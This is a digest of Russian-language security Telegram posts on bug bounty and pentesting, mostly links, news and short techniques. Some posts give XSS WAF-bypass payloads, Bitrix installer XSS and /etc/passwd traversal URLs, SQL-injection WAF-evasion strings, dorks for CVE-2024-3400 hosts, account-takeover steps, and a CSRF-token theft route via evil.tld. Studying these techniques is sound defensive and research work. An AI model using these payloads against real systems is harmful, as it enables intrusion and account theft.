🔎Собираем поддомены и IP в RSECloud
Недавно нашел новый ресурс, под названием RSECloud, который позволяет собирать поддомены и IP'шники организации по домену или имени организации. Работает как в вебе, так и через API.
Чтобы удобно прикрутить его к своей автоматизации накидал небольшой скрипт на GO, который предполагает 3 варианта использования:
Сбор поддоменов:
rsescan -d example.com -key YOUR_API_KEY
rsescan -d example.com -cn -key YOUR_API_KEY
rsescan -so "Organization Name" -key YOUR_API_KEY
👨💻Доклады с PHDays 2
На ютубе появляются доклады с прошедшего PHDays 2 и вот вам некоторые из них:
➖Учат в школе
Выступление, посвященное различным уязвимостям и методам взлома на платформах для обучения хакеров.
➖Выявление многоэтапных SQL-инъекций
Про то, как бизнес-логика может предполагать срабатывание инъекций через несколько этапов и запросов, и показывает инструменты для работы с такими инъекциями.
➖Вам письмо: старые новые атаки на почту
Про уязвимости внедрение кода в современной электронной почте.
➖Тонкости импортозамещения CMS. Собираем bug bounty и БДУ по реестру отечественного ПО
Про поиск уязвимостей в отечественных CMS и пополнение БДУ новыми уязвимостями.
➖XXE: как обработка XML приводит к проблемам с безопасностью
Основы эксплуатации XXE и защиты (или ее отсутствии) от этой уязвимости в разных фреймворках, с примерами уязвимого кода из open-source-проектов.
➖Анализ клиентского JavaScript для обнаружения HTTP-эндпоинтов: два года спустя
Про разработку статического анализатора клиентского JavaScript-кода для обнаружения серверных HTTP-эндпоинтов.
Еще больше крутых выступлений смотрите на ютуб по ссылке ниже.
Ссылка на плейлист
#learn #web #redteam
👊 Эксплуатация двусторонней SSRF с воздействием на сервер и клиента
В статье описывается интересный случай эксплуатации уязвимости SSRF (Server-Side Request Forgery), который затронул как серверную, так и клиентскую стороны и позволил проникнуть во внутренние сети, а также получить доступ к конфиденциальной информации
Ссылка на статью
#web #ssrf #csrf
⭕️Обход WAF для эксплуатации CSPT с использованием разных уровней кодирования
В данной статье подробно объясняются принципы работы CSPT, приводится пример уязвимости на веб-сайте, и способы обхода WAF, используя разное количество декодирований URL.
В частности, описаны различные сценарии, где уровень кодирования WAF отличается от уровня кодирования приложения. Для каждого случая предложены методы обхода, демонстрирующие, как вредоносные URL могут быть пропущены через WAF и использованы для выполнения XSS-атак.
Ссылка на статью
#web #cspt #bypass #waf
🥇Pentest Award возвращается
Ребята из Awillix анонсировали прием заявок на ежегодную премию для пентестеров - Pentest Award.
Вы можете громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики.
В этот раз будет 6 номинаций, по три призовых места в каждой:
— Пробив WEB
— Пробив инфраструктуры
— Девайс
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка
Главный приз — тяжеленная стеклянная именная статуэтка за первое место. Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.
Сбор заявок уже открыт на сайте — https://award.awillix.ru/, а посмотреть, как это было в прошлом году можно тут.
#pentestaward
Привет!
Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.
Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.
Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.
Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️
https://github.com/curiv/russian-offensive-security-questions
#pentest #interview #repository
🌐 Palo Alto GlobalProtect - OS Command Injection
Уязвимость выполнения команд (CVE-2024-3400), затрагивает функцию GlobalProtect в нескольких последних версиях PAN-OS - программного обеспечения, которое работает на большинстве современных устройств брандмауэра Palo Alto Networks.
GlobalProtect - это функция VPN PAN-OS, что приводит к наличию множества уязвимых устройств подключенных к Интернету. Подробный анализ читайте по ссылке.
Дорк Shodan:http.html_hash:-1303565546
Дорк Censys:services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1
Дорк Fofa:icon_hash="-631559155"
Дорк Zoomeye app:"Palo Alto Networks firewall httpd"
Дорк Hunter.howproduct.name="GlobalProtect Portal"
Ссылка на PoC
Ссылка на шаблон Nuclei
#web #rce #dork #cve
В нашем новом выпуске мы пригласили человека из мира мобильного багхантинга, активного участника форума Antichat, и автора проекта reFlutter. Его история вызывает восхищение и уважение 🦾
https://youtu.be/2KCSxYQ543M
Тем временем, число подписчиков на канале перевалило за 10к! Спасибо всем за то, что читаете, шарите посты по другим каналам и чатикам, а также делитесь фидбеком и интересными находками, вы крутые!❤️
Читать полностью…😈 Social Engineering — самый крупный ресурс в Telegram, посвященный Информационной Безопасности, OSINT и Cоциальной Инженерии.
Особое внимание стоит обратить на следующую информацию:
➖ Собственный бот, который проверит Ваш файл 70 антивирусами одновременно.
➖ Наш репозиторий с подборкой материала для изучения компьютерных сетей.
➖ Коллекция инструментов и ресурсов для поиска информации о человеке в 2024 году.
➖ Актуальные методы социальной инженерии и профайлинга.
➖ Бесплатные курсы для изучения ИБ и OSINT.
Вас ждёт только актуальный и качественный материал. @S.E.
🗂 #заметки #web #offense
➡️Rather old, but gold информация, которая до сих пор пригождается при анализе защищённости веб-приложений;
🧩 BlackFan/content-type-research
Манипуляция Content-Type
для эксплуатации некорректного парсинга и, следовательно, для обхода WAF, внедрения полезной нагрузки для XSS и проведения CSRF;
Базовый пример идеи из репозитория:
Content-Type:application/x-www-form-urlencoded
Body:q=' union select '1
➡️ App:' union select 1'
➡️ WAF:' union select 1'
Content-Type:application/json
Body:{"q":"' \u0075nion \u0073elect '1"}
➡️ App:' union select 1'
➡️ WAF:' union select 1'
Content-Type:application/x-www-form-urlencoded;/json
Body:{"q":"' \u0075nion \u0073elect '1"}
➡️ App:' union select 1'
➡️ WAF:{"q":"' \u0075nion \u0073elect '1"}
Content-Type
, которые могут быть использованы для внедрения полезной нагрузки для эксплуатации XSS;Content-Type
, которые могут быть использованы для cross-origin запросов в зависимости от браузера;// Подобное от PortSwigger: XSS/Cheat-Sheet#Prototype Pollution
🎤Responsible disclosure podcast
Топ немецкого багбаунти @Valyaroller наконец представил первый выпуск своего подкаста на русском языке. Всем багхантерам, пентестерам и тем, кто в теме рекомендую к просмотру! Поддержите лайками, подписками и полезным фидбеком!
Ссылка на YouTube
Две недели назад вышел новый релиз Nuclei v3.2.0 от Project Discovery
.
В новой версии добавили расширенную функциональность сканов с учетными данными, поддерживающую различные схемы аутентификации
nuclei -u http://example.com/ -secret-file example_auth.yaml
Basic Auth, API Key, Bearer Token, Custom Header, Cookie
OAuth2.0
, когда статичные креды (username и password) используются для получения Session Tokens/Cookie, Custom Header
Secret file
содержит учетные данные для аутентификации для ресурсов по совпадению значений domains и domains-regex
, без необходимости изменять уже существующие шаблоныstatic:
# 1. Basic Auth based auth
- type: basicauth
domains:
- scanme.sh
username: test
password: test
# 2. Bearer Token based auth
- type: bearertoken
domains-regex:
- .*scanme.sh
- .*example.com
token: test
dynamic:
- template: /path/to/wordpress-login.yaml
variables:
- name: username
value: test
- name: password
value: test
type: cookie
domains:
- blog.example.com
cookies:
- raw: "{{wp-global-cookie}}"
- raw: "{{wp-admin-cookie}}"
- raw: "{{wp-plugin-cookie}}"
HashiCorp Vault, AWS Secrets Manager и 1Password
Читать полностью…
📨Немного про уязвимости в функциях регистрации и приглашения пользователей
Неоднократно сталкивался с подобным кейсом в различных компаниях:
🔹Используем функцию приглашения пользователя и указываем там свою резервную почту
🔹Получаем приглашение себе на резервную почту
🔹Переходим по ссылке из приглашения, задаем пароль, перехватываем запрос и изменяем адрес электронной почты в запросе через параметр "email" на почту жертвы
🔹Получаем аккаунт, зарегистрированный на чужую почту без подтверждения от её владельца.
Но как можно повысить импакт?
🔹попробовать подставить почту существующего пользователя, что может привести к смене его пароля и, как следствие, захвату аккаунта
🔹если предыдущий трюк не сработал, то можно еще проверить на CSRF. Недавно на багбаунти попался похожий кейс, где просто подстановка почты жертвы не работала, но при CSRF с куками жертвы позволяла поменять ему адрес почты и/или пароль без подтверждения
🔹попробовать зарегистрировать корпоративные учетки, например, такие как shdw@company.com, admin@company.com и т.д. Для корпоративных учеток может быть доступен дополнительный (в том числе админский) функционал, недоступный обычным пользователям.
#web #logic #ato
Доброй ночи.
Написал небольшую книжку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
👾Как был найден RCE в одной из публичных программ на Bugcrowd
В статье описывается пошаговый процесс поиска RCE, начиная со сбора интересных активов и сканирования портов, и заканчивая тестированием различных эксплойтов и проверкой эндпоинтов. Автор также рассказывает о своих неудачах и успехах, приводя пример того, как настойчивость, упорство и немного удачи привели к успешному обнаружению серьезной уязвимости.
Ссылка на статью
#web #rce #struts
Подведем итоги нашего бесплатного курса "Linux для новичков". Курс был составлен из различных модулей, предназначенных для ознакомления с основными аспектами работы в операционной системе Linux.
В рамках курса были изучены основы работы с файлами и директориями, управление пользователями и группами, сетевые возможности Linux, мониторинг, журналирование и проверка безопасности. Также были рассмотрены темы работы с данными и дисками в Linux, туннелирование трафика и полезные инструменты для взлома.
Неделя 1: Введение в Linux
• Что такое Linux и почему его выбирают?
• Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
• Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
• Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
• Структура файловой системы Linux: /bin, /etc, /home и др.
• Пакетный менеджер APT для установки и обновления программ.
• Основы текстового редактора nano: открытие, редактирование и сохранение файлов.
Неделя 2: Работа с файлами и директориями
• Основные команды для работы с файлами и директориями: cp, mv, rm и др.
• Работа с архивами в Linux: создание, разархивирование, просмотр.
• Поиск файлов и содержимого в Linux: команды find и grep.
• Управление правами доступа к файлам и директориям в Linux: chmod и chown.
• Символьные и жесткие ссылки: создание и использование.
• Управление процессами и задачами в Linux: команды ps, top, kill и др.
• Автоматическое выполнение задач с помощью cron.
Неделя 3: Управление пользователями и группами
• Создание и удаление пользователей в Linux: команды useradd и userdel.
• Управление паролями пользователей: команда passwd.
• Назначение пользователей в группы: команда usermod.
• Создание и удаление групп в Linux: команды groupadd и groupdel.
• Управление правами доступа к файлам и директориям для пользователей и групп.
• Просмотр информации о пользователях и группах: команды id, whoami и др.
• Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Неделя 4: Сетевые возможности Linux
• Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
• Проверка сетевого подключения: команда ping.
• Конфигурация сетевых интерфейсов: команды ifconfig и ip.
• Работа с удаленными хостами через SSH: подключение, передача файлов.
• Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf.
• Настройка файрвола в Linux: команда iptables.
• Основы настройки и использования сетевых служб в Linux: FTP, Samba и др.
• Основы настройки и использования сетевых служб в Linux: Apache.
Неделя 5: Мониторинг, журналирование, проверка безопасности.
• Лог файлы системы Linux
• Как настроить центральный сервер ведения логов с помощью Rsyslog в Linux.
• Анализ лог-файлов: команды grep, awk, sed.
• Настройка системы мониторинга и аудита: утилиты auditd, nmon.
• Система мониторинга Zabbix
• Мониторинг сети с помощью tcpdump
• Проверка безопасности системы с помощью LinPEAS
Неделя 6: Работа с данными и дисками в Linux
• Использование утилиты rsync для синхронизации данных.
• Основы языка сценариев Bash: переменные, условия, циклы.
• Создание и выполнение сценариев Bash: утилита bash.
• Работа с образами дисков: команды dd, ddrescue.
• Восстановление данных с помощью LiveCD.
• Создание и настройка RAID-массивов для защиты данных.
• Дефрагментация диска Linux
Неделя7: Туннелирование трафика
• Установка и настройка OpenVPN сервера на Ubuntu
• Простая настройка WireGuard Linux.
• Настройка Shadowsocks.
• Pivoting: Chisel
• SSH туннели
• Проксирование трафика с помощью proxychains
• Pivoting: Lugolo-ng
Неделя 8: Полезные инструменты для взлома
• nmap 1 часть
• nmap 2 часть
• nmap 3 часть
• crackmapexec
• metasploit
• Burp Suite
• sqlmap
Не забывайте сохранить и поделиться нашим бесплатным курсом "Linux для новичков"!
#Linux #обучениеlinux #статьипоLinux
LH | Новости | Курсы | Мемы
💉 Продвинутые SQL инъекции для AWAE
Репозиторий по ссылке предназначен для обучения и демонстрации методов продвинутой SQL-инъекции. Он содержит примеры, учебные материалы и практические задания, ориентированные на подготовку к экзамену Offensive Web Application Expert (AWAE) от Offensive Security.
Вы сможете изучить различные техники эксплуатации SQL-инъекций, включая их обнаружение, использование и защиту от них.
В репозитории представлены подробные пошаговые инструкции и примеры кода, которые позволяют практиковаться в выполнении сложных атак на веб-приложения.
Ссылка на GitHub
#sqli #bypass #learn
💥 Как мы превратили DOM XSS в изощренный захват аккаунта в один клик, оцененный в $8000
Увлекательное кейс-исследование, где авторам удалось превратить простой, на первый взгляд, DOM XSS в изощренный захват аккаунта в один клик. В статье рассказано о мыслительном процессе, преградах, с которыми пришлось столкнуться, и о том, как их преодолеть, чтобы получить полностью рабочий эксплойт.
Читать статью
#web #xss #ato
🪙 Bug Bounty Blueprint: Руководство для начинающих.
• Очень информативное руководство по Bug Bounty, которое содержит полезные инструменты, лабы, ресерчи, кейсы из жизни и еще очень много полезных ссылок.
➡️ https://blog.securitybreached.org/
#BB
Спасибо @ValyaRoller за приглашение на подкаст! Подписывайтесь на его замечательный канал @pigPeter
Кому интересен кейс с paypal, тут подробнее можно почитать: t.me/postImpact/6
такой же кейс все еще работает с TripAdvisor так что можете счейнить до high с любой xss на поддоменах: Pattern.compile("^(?:https?\\:\\/\\/(?:[A-Za-z0-9_\\-]+\\.(dhcp(\\-[A-Za-z]+)?\\.([A-Za-z0-9_\\-]+\\.corp\\.)?|(nw\\.)?dev(\\-[A-Za-z]+)?\\.|cmc\\.|d\\.)?)?tripadvisor\\.(?:com|(?:[a-z]{2})|(?:(?:co|com)\\.[a-z]{2})))?\\/.*$");
Вообще многие сдают не раскручивая — сдают medium вместо high теряя значительное bounty.
Еще кейс с dyson не попал в видео, там я рассказывал про то что у них одна тестовая репа попала в публичный bitbucket (всего на пару часов), а там был логин/пароль QA. И пароль подходил к его рабочему outlook , внутреннему bitbucket и slack. Как итог - доступ к главному домену dyson.com и сорцам. Так что нужны второй фактор и еще фингерпиринты к браузерам/ip.
про мою первую багу в ICQ, на самом деле 150$ (отчет оказался частично раскрытым) — https://hackerone.com/reports/373909
👍 Обход защиты от XSS
Статья по байпассу средств защиты от XSS для некоторых кейсов. Как итог, получаем несколько довольно универсальных пэйлодов, которые могут пригодится вам и в других случаях (мне пригодились):
Imperva & Incapsula:<details/open/id="""ontoggle=[JS]>
Amazon Cloudfront<details/open/id="""ontoggle=[JS]>
Akamai<details open id="' "'"ontoggle=[JS]>
Еще больше байпассов для XSS доступно в репозитории на GitHub.
#web #xss #waf #bypass
😱 Уязвимости в установщике Битрикс
Для установки Битрикса есть скрипт bitrixsetup.php
, который разработчики рекомендуют удалять после установки, но, как выяснилось, не все это делают. При обнаружении этого скрипта основной вектор атаки, который приходит в голову, это переустановить CMS и загрузить веб-шелл через административную панель.
Иногда админы просто ограничивают права на запись в директорию и считают, что этого будет достаточно, однако данный скрипт сам по себе оказался уязвим к XSS и LFR:
XSS:
https://target.com/bitrixsetup.php?action=UNPACK&filename=<img src='' onerror=alert(document.domain)>
https://target.com/bitrixsetup.php?action=UNPACK&filename=../../../../etc/passwd
🌐 Увеличиваем Attack Surface на пентесте периметра
На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях приходится recon-ить все ресурсы компании самостоятельно. Зачастую компании сами не подозревают, какие ресурсы у них могут «торчать наружу».
Аналогичная ситуация ждет вас и на багбаунти, когда у программы широкий скоуп и грамотная разведка и сбор ресурсов компании может помочь найти вам то, что не нашли другие.
Из статьи ниже вы поймете на практическом примере как производить сбор IP-адресов заказчика, а также проводить горизонтальный и вертикальный поиск доменов.
Читать статью
#web #recon
С двух ног врываюсь в фаззинг/экплоит дев браузеров. сразу получеными двумя CVE(UXSS и Adress Bar Spofing) и футболкой по почте. На самом деле потребовалось полтора года на попытки и освоение движка V8, и умение фаззить. А оказалось достаточно все просто, с нуля написать фаззер, благо если знаешь теория пишется быстро, выставление санитайзероми и https://github.com/YulinSec/ChatGPTScanner как проверка на действительно полезные вылеты программ. Наконец нормально рабочие примение LLM в ИБ. Схема проста, фаззер фаззит, дает тебе вылеты, тот скрипт проверяет на ценность вылетов, при легком изменение кода сам пишет poc. Тебе только проверять на действительные ценные poc.
В частности следующий апдейт хрома будет из за меня, так что извините.
PS? Этот канал был создан что бы выкладывать свои пет проекты/идеи которые всплывают в голове.
⭕️Про сlient-side path traversal
Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.
Например, если приложение через fetch()
добавляет заголовок csrfToken
при обращении к /api/user
, то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на /api/user/../redirect?to=evil.tld/corsAllow
Еще больше практических примеров использования path traversal на стороне клиента вы можете узнать из статей, представленных ниже:
➖Practical Example Of Client Side Path Manipulation
➖From an Innocent Client-Side Path Traversal to Account Takeover
➖Client-side path traversal vulnerability class explained - $6,580 GitLab bug bounty
➖Practical Client Side Path Traversal Attacks
Nightbloodz/the-power-of-client-side-path-traversal-how-i-found-and-escalated-2-bugs-through-670338afc90f">➖The power of Client-Side Path Traversal: How I found and escalated 2 bugs through "../"
#web #pathtraversal
🖥 Автоматизируем поиск CRLF
Наткнулся на пост, где автор вдохновился исследованием HTTP Request Splitting от @blackfan и решил накидать скрипт для детекта некоторых представленных там уязвимостей.
Подробнее про работу скрипта рассказано тут а сам код доступен на GitHub. А на скрине сверху, уже другой исследователь запилил шаблон для Bcheck, чтобы детектить это в Burp Suite.
Для эксплуатации уязвимой конечной точки можете обратиться к данному исследованию и помните, чтобы иметь хороший рабочий PoC при отправке - демонстрируйте импакт, а не уязвимость.
#web #crlf
⌨️Как киношные хакеры испортили жизнь ИБ-специалистам
Многие из нас видели в кино кулхацкеров способных в пару кликов взломать любую систему. Вдобавок к этому сцены взлома сопровождаются звуковыми и визуальными эффектами, которые вызывают если не смех, то ироническую улыбку у всех, кто в теме.
В статье на Хабре автор решил развеять миф о всесильности хакеров и объяснить, как этот миф мешает внедрению культуры кибербезопасности в компаниях.
Ссылка на Habr